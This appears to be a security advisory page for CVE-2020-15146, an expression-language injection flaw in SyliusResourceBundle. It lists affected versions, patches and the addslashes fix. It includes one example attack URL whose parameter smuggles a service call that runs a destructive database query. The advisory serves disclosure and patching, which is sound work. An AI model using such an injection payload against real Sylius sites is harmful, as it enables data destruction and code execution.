CVE-2020-15146

CRITICAL9.6EPSS 1.1%

Remote Code Execution in SyliusResourceBundle

發布日:2020/8/19修改日:2026/3/13

描述

### Impact Request parameters injected inside an expression evaluated by `symfony/expression-language` package haven't been sanitized properly. This allows the attacker to access any public service by manipulating that request parameter, allowing for Remote Code Execution. The vulnerable versions include: `<=1.3.13 || >=1.4.0 <=1.4.6 || >=1.5.0 <=1.5.1 || >=1.6.0 <=1.6.3`. ### Example ```yaml sylius_grid: grids: foo: fields: bar: options: baz: "expr:service('sylius.repository.product').find($id)" ``` In this case, `$id` can be prepared in a way that calls other services. If you visit `/route?id="~service('doctrine').getManager().getConnection().executeQuery("DELETE * FROM TABLE")~"`, it will result in a following expression `expr:service('repository').find(""~service('doctrine').getManager().getConnection().executeQuery("DELETE * FROM TABLE")~"")`, which will execute a query on the currently connected database. To find a vulnerability in your application, look for any routing definition that uses request parameters inside expression language. ### Patches This issue has been patched for versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4. Versions prior to 1.3 were not patched. ### Workarounds The fix requires adding `addslashes` in `OptionsParser::parseOptionExpression` to sanitize user input before evaluating it using the expression language. ```php - return is_string($variable) ? sprintf('"%s"', $variable) : $variable; + return is_string($variable) ? sprintf('"%s"', addslashes($variable)) : $variable; ``` ### Acknowledgements This security issue has been reported by Craig Blanchette (@isometriks), thanks a lot! ### For more information If you have any questions or comments about this advisory: * Email us at [[email protected]](mailto:[email protected])

受影響套件(1)

CVSS 分數

來源版本嚴重程度向量
osvCVSS 3.1CRITICAL9.6CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

參考連結(5)